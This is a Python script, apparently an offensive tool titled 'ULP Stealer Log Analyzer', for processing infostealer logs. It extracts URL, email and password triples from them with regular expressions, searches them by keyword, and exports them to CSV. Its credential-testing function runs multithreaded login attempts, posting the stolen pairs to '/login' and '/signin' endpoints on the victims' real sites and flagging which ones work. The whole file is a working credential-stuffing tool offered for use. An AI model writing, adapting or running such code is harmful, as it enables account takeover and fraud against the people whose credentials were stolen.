#!/usr/bin/env python3
"""
ULP Stealer Log Analyzer v1.0
"""

import sys
import os
import re
import requests
import csv
import time
import subprocess
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse

def clear_screen():
    os.system('clear' if os.name == 'posix' else 'cls')

def banner():
    clear_screen()
    print("""
╔══════════════════════════════════════════════════════╗
║    ULP STEALER LOG ANALYZER v1.0 - By Mironova       ║
║                Stealer Log Parser                    ║
║            URL/Email/Passwd Checker                  ║
╚══════════════════════════════════════════════════════╝
    """)

def show_dir():
    try:
        result = subprocess.run(['ls', '-lh'], capture_output=True, text=True)
        print("\n" + "="*60)
        print("CURRENT DIRECTORY:")
        print(result.stdout)
        print("="*60)
    except:
        print(f"\nCurrent dir: {os.getcwd()}")
        try:
            for f in os.listdir('.'):
                if os.path.isfile(f):
                    size = os.path.getsize(f)
                    print(f"  {f} ({size/1024:.1f}KB)")
        except:
            pass

def print_usage():
    print("""
╔══════════════════════════════════════════════════════╗
║                        USAGE:                         ║
╠══════════════════════════════════════════════════════╣
║  python3 ulp-checker.py                 Interactive  ║
║  python3 ulp-checker.py --ls            List files   ║
║  python3 ulp-checker.py -h              This screen  ║
║                                                      ║
║  Inside menu: type 'ls' anytime to list files        ║
╚══════════════════════════════════════════════════════╝
    """)

class ULPAnalyzer:
    def __init__(self):
        self.log_file = ""
        self.credentials = []
    
    def select_log_file(self):
        print("\n" + "═"*60)
        print("🔍  SELECT LOG FILE")
        print("═"*60)
        show_dir()
        
        while True:
            path = input("💾 Enter FULL file path: ").strip().strip('"\'')
            
            if path.lower() == 'ls':
                show_dir()
                continue
            if path.lower() == 'q':
                sys.exit(0)
            
            if not os.path.exists(path):
                print("❌ File not found")
                continue
            
            self.log_file = os.path.abspath(path)
            size = os.path.getsize(path) / (1024*1024*1024)
            print(f"✅ LOADED: {self.log_file}")
            print(f"📏 SIZE: {size:.2f} GB")
            
            if input("⚡ Use this file? (y/n): ").lower() == 'n':
                continue
            return True
    
    def parse_credentials(self):
        print("\n" + "═"*60)
        print("🔓 PARSING CREDENTIALS...")
        print("═"*60)
        
        patterns = [
            r'(https?://[^\s"\'<>]+?)[^\w]*?([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})[^\w]*?([^\s"\'<>]{6,})',
            r'"url"[^"]*"([^"]+)"[^"]*"email"[^"]*"([^"]+)"[^"]*"password"[^"]*"([^"]+)"',
            r'([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})[^a-zA-Z0-9]+([^\s]{6,})[^a-zA-Z0-9]+(https?://[^\s]+)',
        ]
        
        content = ""
        encodings = ['utf-8', 'latin-1', 'cp1252']
        
        for enc in encodings:
            try:
                with open(self.log_file, 'r', encoding=enc, errors='ignore') as f:
                    content = f.read()
                print(f"📖 Read with encoding: {enc}")
                break
            except:
                continue
        
        if not content:
            print("❌ Cannot read file")
            return []
        
        self.credentials = []
        emails = set()
        
        for pattern in patterns:
            matches = re.finditer(pattern, content, re.IGNORECASE | re.DOTALL)
            for match in matches:
                groups = match.groups()
                if len(groups) == 3:
                    url, email, pwd = [g.strip().strip('"\' ') for g in groups]
                    email = email.lower()
                    
                    if (re.match(r'^https?://', url) and 
                        '@' in email and 
                        len(pwd) >= 6 and 
                        email not in emails):
                        
                        emails.add(email)
                        self.credentials.append((url, email, pwd))
        
        print(f"✅ FOUND {len(self.credentials)} UNIQUE CREDENTIALS")
        
        if self.credentials:
            print("📋 FIRST 3:")
            for i, (url, email, pwd) in enumerate(self.credentials[:3]):
                print(f"  {i+1}. {url[:60]}... | {email}")
        
        return self.credentials
    
    def search_keywords(self):
        print("\n" + "═"*60)
        print("🔍 KEYWORD SEARCH")
        print("═"*60)
        keywords = input("📝 Keywords (space separated): ").strip()
        if not keywords:
            return
        
        keywords = [k.strip() for k in keywords.split()]
        limit = input("📊 Max results (Enter=50): ").strip()
        limit = int(limit) if limit.isdigit() else 50
        
        results = []
        print(f"🔎 Searching for: {', '.join(keywords)}")
        
        for i, (url, email, pwd) in enumerate(self.credentials):
            if len(results) >= limit:
                break
            if any(keyword.lower() in url.lower() + email.lower() + pwd.lower() 
                   for keyword in keywords):
                results.append((url, email, pwd))
                print(f"✅ {len(results)}. {url[:50]}... | {email}")
        
        print(f"\n📊 FOUND {len(results)} RESULTS")
        return results
    
    def test_credentials(self):
        print("\n" + "═"*60)
        print("⚡ CREDENTIAL TESTING")
        print("═"*60)
        limit_str = input("🎯 Test how many? (Enter=50): ").strip()
        limit = int(limit_str) if limit_str.isdigit() else 50
        
        thread_str = input("🔄 Threads? (Enter=10): ").strip()
        threads = int(thread_str) if thread_str.isdigit() else 10
        
        print(f"🚀 Testing {min(len(self.credentials), limit)} with {threads} threads...")
        valid = []
        
        def test_cred(cred):
            try:
                url, email, pwd = cred
                session = requests.Session()
                endpoints = [
                    f"{url.rstrip('/')}/login",
                    f"{url.rstrip('/')}/signin"
                ]
                
                for endpoint in endpoints:
                    try:
                        resp = session.post(endpoint, 
                                          data={'email': email, 'password': pwd},
                                          timeout=10, allow_redirects=True)
                        if resp.status_code == 200 and len(resp.history) > 0:
                            return f"🟢 VALID: {email}:{pwd[:10]}... -> {endpoint}"
                    except:
                        pass
            except:
                pass
            return None
        
        with ThreadPoolExecutor(max_workers=threads) as executor:
            futures = [executor.submit(test_cred, cred) 
                      for cred in self.credentials[:limit]]
            
            for i, future in enumerate(as_completed(futures), 1):
                result = future.result()
                if result:
                    valid.append(result)
                    print(result)
                print(f"\r⚡ Tested {i}/{len(futures)}...", end='', flush=True)
        
        print(f"\n✅ VALID CREDENTIALS: {len(valid)}")
        return valid
    
    def export_csv(self, results, filename):
        try:
            with open(filename, 'w', newline='', encoding='utf-8') as f:
                writer = csv.writer(f)
                writer.writerow(['URL', 'Email', 'Password'])
                for url, email, pwd in results:
                    writer.writerow([url, email, pwd])
            print(f"💾 EXPORTED TO: {os.path.abspath(filename)}")
        except Exception as e:
            print(f"❌ Export error: {e}")

def main():
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('--ls', action='store_true', help='List directory')
    parser.add_argument('-h', '--help', action='store_true', help='Show help')
    
    args = parser.parse_args()
    
    if args.help:
        banner()
        print_usage()
        return
    
    if args.ls:
        banner()
        show_dir()
        return
    
    analyzer = ULPAnalyzer()
    banner()
    
    while True:
        print("\n" + "═"*60)
        print("🎮 MAIN MENU")
        print("═"*60)
        print("1. 🔓 Load/parse file")
        print("2. 🔍 Keyword search")
        print("3. ⚡ Test credentials")
        print("4. 📋 List credentials") 
        print("5. 💾 Export all")
        print("ls. 📁 Show directory")
        print("0. 🚪 Quit")
        print(f"📊 STATUS: {len(analyzer.credentials)} creds loaded")
        
        choice = input("\n⚡ Choice: ").strip().lower()
        
        if choice == 'ls':
            show_dir()
        elif choice == '1':
            if analyzer.select_log_file():
                analyzer.parse_credentials()
        elif choice == '2' and analyzer.credentials:
            analyzer.search_keywords()
        elif choice == '3' and analyzer.credentials:
            analyzer.test_credentials()
        elif choice == '4' and analyzer.credentials:
            print(f"\n📊 {len(analyzer.credentials)} TOTAL:")
            for i, (url, email, pwd) in enumerate(analyzer.credentials[:20]):
                print(f"{i+1:2d}. {url[:55]} | {email}")
            if len(analyzer.credentials) > 20:
                print("...")
        elif choice == '5' and analyzer.credentials:
            analyzer.export_csv(analyzer.credentials, f"ulp_export_{int(time.time())}.csv")
        elif choice == '0':
            print("\n👋 Later skid!")
            break
        else:
            print("❌ Load a file first or invalid choice")
        
        input("\n⏎ Press Enter to continue...")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n🛑 CTRL+C - Exiting...")
        sys.exit(0)
    except Exception as e:
        print(f"\n💥 CRASH: {e}")
        sys.exit(1)